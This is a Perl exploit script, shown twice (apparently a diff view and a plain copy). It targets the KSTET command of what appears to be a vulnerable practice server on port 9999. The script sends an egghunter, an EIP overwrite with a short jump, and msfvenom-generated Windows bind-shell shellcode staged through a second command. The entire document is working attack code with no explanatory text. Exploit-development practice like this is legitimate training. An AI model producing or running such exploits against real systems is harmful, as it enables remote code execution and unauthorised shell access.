0xbadjuju · January 31, 2020 19:00
diff --git a/kstet.pl b/kstet.pl
 #!/usr/bin/perl

 use strict;
 use warnings;

 use Encode qw/encode/;
 use Socket;

 my $target = inet_aton("192.168.99.144");
 my $port = 9999;
 my $portaddr = sockaddr_in($port, $target);

 #Stage 1
 my $header = "KSTET /.:/";
 my $egghunter = 
 "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05" .
 "\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf" .
 "\x75\xe7\xff\xe7";
 my $padding1 = "A" x 34;
 #[*] Exact match at offset 66
 my $eip = "\xAF\x11\x50\x62";
 my $jmpshort = "\xEB\xB8";
 my $padding2 = "B" x 38;

 #Stage 2
 my $header2 = "GDOG ";
 my $egg = "w00tw00t";
 #msfvenom -p windows/shell_bind_tcp -b "\x00" -f perl
 my $payload = 
 "\xda\xda\xd9\x74\x24\xf4\xbf\x4a\xf8\x0a\x45\x5e\x2b\xc9" .
 "\xb1\x53\x31\x7e\x17\x03\x7e\x17\x83\x8c\xfc\xe8\xb0\xec" .
 "\x15\x6e\x3a\x0c\xe6\x0f\xb2\xe9\xd7\x0f\xa0\x7a\x47\xa0" .
 "\xa2\x2e\x64\x4b\xe6\xda\xff\x39\x2f\xed\x48\xf7\x09\xc0" .
 "\x49\xa4\x6a\x43\xca\xb7\xbe\xa3\xf3\x77\xb3\xa2\x34\x65" .
 "\x3e\xf6\xed\xe1\xed\xe6\x9a\xbc\x2d\x8d\xd1\x51\x36\x72" .
 "\xa1\x50\x17\x25\xb9\x0a\xb7\xc4\x6e\x27\xfe\xde\x73\x02" .
 "\x48\x55\x47\xf8\x4b\xbf\x99\x01\xe7\xfe\x15\xf0\xf9\xc7" .
 "\x92\xeb\x8f\x31\xe1\x96\x97\x86\x9b\x4c\x1d\x1c\x3b\x06" .
 "\x85\xf8\xbd\xcb\x50\x8b\xb2\xa0\x17\xd3\xd6\x37\xfb\x68" .
 "\xe2\xbc\xfa\xbe\x62\x86\xd8\x1a\x2e\x5c\x40\x3b\x8a\x33" .
 "\x7d\x5b\x75\xeb\xdb\x10\x98\xf8\x51\x7b\xf5\xcd\x5b\x83" .
 "\x05\x5a\xeb\xf0\x37\xc5\x47\x9e\x7b\x8e\x41\x59\x7b\xa5" .
 "\x36\xf5\x82\x46\x47\xdc\x40\x12\x17\x76\x60\x1b\xfc\x86" .
 "\x8d\xce\x69\x8e\x28\xa1\x8f\x73\x8a\x11\x10\xdb\x63\x78" .
 "\x9f\x04\x93\x83\x75\x2d\x3c\x7e\x76\x40\xe1\xf7\x90\x08" .
 "\x09\x5e\x0a\xa4\xeb\x85\x83\x53\x13\xec\xbb\xf3\x5c\xe6" .
 "\x7c\xfc\x5c\x2c\x2b\x6a\xd7\x23\xef\x8b\xe8\x69\x47\xdc" .
 "\x7f\xe7\x06\xaf\x1e\xf8\x02\x47\x82\x6b\xc9\x97\xcd\x97" .
 "\x46\xc0\x9a\x66\x9f\x84\x36\xd0\x09\xba\xca\x84\x72\x7e" .
 "\x11\x75\x7c\x7f\xd4\xc1\x5a\x6f\x20\xc9\xe6\xdb\xfc\x9c" .
 "\xb0\xb5\xba\x76\x73\x6f\x15\x24\xdd\xe7\xe0\x06\xde\x71" .
 "\xed\x42\xa8\x9d\x5c\x3b\xed\xa2\x51\xab\xf9\xdb\x8f\x4b" .
 "\x05\x36\x14\x7b\x4c\x1a\x3d\x14\x09\xcf\x7f\x79\xaa\x3a" .
 "\x43\x84\x29\xce\x3c\x73\x31\xbb\x39\x3f\xf5\x50\x30\x50" .
 "\x90\x56\xe7\x51\xb1";

 my $stage1 = $header2 . $egg . $payload;

 my $stage2 = $header . $egghunter . $padding1 . $eip . $jmpshort . $padding2;

 socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "Can't create a socket $!\n";

 connect(SOCKET , $portaddr) or die "Unable to connect to socket $!\n";

 recv(SOCKET, my $recieve1, 500, 0);
 print $recieve1 . "\r\n";

 print $stage1 . "\r\n";
 send(SOCKET, $stage1, 0) == length($stage1) or die "cannot send to $target($port): $!";
 recv(SOCKET, my $recieve2, 500, 0);
 print $recieve2 . "\r\n";

 print $stage2 . "\r\n";
 send(SOCKET, $stage2, 0) == length($stage2) or die "cannot send to $target($port): $!";

 close SOCKET or die "close: $!";
	#!/usr/bin/perl

	use strict;
	use warnings;

	use Encode qw/encode/;
	use Socket;

	my $target = inet_aton("192.168.99.144");
	my $port = 9999;
	my $portaddr = sockaddr_in($port, $target);

	#Stage 1
	my $header = "KSTET /.:/";
	my $egghunter =
	"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05" .
	"\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf" .
	"\x75\xe7\xff\xe7";
	my $padding1 = "A" x 34;
	#[*] Exact match at offset 66
	my $eip = "\xAF\x11\x50\x62";
	my $jmpshort = "\xEB\xB8";
	my $padding2 = "B" x 38;

	#Stage 2
	my $header2 = "GDOG ";
	my $egg = "w00tw00t";
	#msfvenom -p windows/shell_bind_tcp -b "\x00" -f perl
	my $payload =
	"\xda\xda\xd9\x74\x24\xf4\xbf\x4a\xf8\x0a\x45\x5e\x2b\xc9" .
	"\xb1\x53\x31\x7e\x17\x03\x7e\x17\x83\x8c\xfc\xe8\xb0\xec" .
	"\x15\x6e\x3a\x0c\xe6\x0f\xb2\xe9\xd7\x0f\xa0\x7a\x47\xa0" .
	"\xa2\x2e\x64\x4b\xe6\xda\xff\x39\x2f\xed\x48\xf7\x09\xc0" .
	"\x49\xa4\x6a\x43\xca\xb7\xbe\xa3\xf3\x77\xb3\xa2\x34\x65" .
	"\x3e\xf6\xed\xe1\xed\xe6\x9a\xbc\x2d\x8d\xd1\x51\x36\x72" .
	"\xa1\x50\x17\x25\xb9\x0a\xb7\xc4\x6e\x27\xfe\xde\x73\x02" .
	"\x48\x55\x47\xf8\x4b\xbf\x99\x01\xe7\xfe\x15\xf0\xf9\xc7" .
	"\x92\xeb\x8f\x31\xe1\x96\x97\x86\x9b\x4c\x1d\x1c\x3b\x06" .
	"\x85\xf8\xbd\xcb\x50\x8b\xb2\xa0\x17\xd3\xd6\x37\xfb\x68" .
	"\xe2\xbc\xfa\xbe\x62\x86\xd8\x1a\x2e\x5c\x40\x3b\x8a\x33" .
	"\x7d\x5b\x75\xeb\xdb\x10\x98\xf8\x51\x7b\xf5\xcd\x5b\x83" .
	"\x05\x5a\xeb\xf0\x37\xc5\x47\x9e\x7b\x8e\x41\x59\x7b\xa5" .
	"\x36\xf5\x82\x46\x47\xdc\x40\x12\x17\x76\x60\x1b\xfc\x86" .
	"\x8d\xce\x69\x8e\x28\xa1\x8f\x73\x8a\x11\x10\xdb\x63\x78" .
	"\x9f\x04\x93\x83\x75\x2d\x3c\x7e\x76\x40\xe1\xf7\x90\x08" .
	"\x09\x5e\x0a\xa4\xeb\x85\x83\x53\x13\xec\xbb\xf3\x5c\xe6" .
	"\x7c\xfc\x5c\x2c\x2b\x6a\xd7\x23\xef\x8b\xe8\x69\x47\xdc" .
	"\x7f\xe7\x06\xaf\x1e\xf8\x02\x47\x82\x6b\xc9\x97\xcd\x97" .
	"\x46\xc0\x9a\x66\x9f\x84\x36\xd0\x09\xba\xca\x84\x72\x7e" .
	"\x11\x75\x7c\x7f\xd4\xc1\x5a\x6f\x20\xc9\xe6\xdb\xfc\x9c" .
	"\xb0\xb5\xba\x76\x73\x6f\x15\x24\xdd\xe7\xe0\x06\xde\x71" .
	"\xed\x42\xa8\x9d\x5c\x3b\xed\xa2\x51\xab\xf9\xdb\x8f\x4b" .
	"\x05\x36\x14\x7b\x4c\x1a\x3d\x14\x09\xcf\x7f\x79\xaa\x3a" .
	"\x43\x84\x29\xce\x3c\x73\x31\xbb\x39\x3f\xf5\x50\x30\x50" .
	"\x90\x56\xe7\x51\xb1";

	my $stage1 = $header2 . $egg . $payload;

	my $stage2 = $header . $egghunter . $padding1 . $eip . $jmpshort . $padding2;

	socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "Can't create a socket $!\n";

	connect(SOCKET , $portaddr) or die "Unable to connect to socket $!\n";

	recv(SOCKET, my $recieve1, 500, 0);
	print $recieve1 . "\r\n";

	print $stage1 . "\r\n";
	send(SOCKET, $stage1, 0) == length($stage1) or die "cannot send to $target($port): $!";
	recv(SOCKET, my $recieve2, 500, 0);
	print $recieve2 . "\r\n";

	print $stage2 . "\r\n";
	send(SOCKET, $stage2, 0) == length($stage2) or die "cannot send to $target($port): $!";

	close SOCKET or die "close: $!";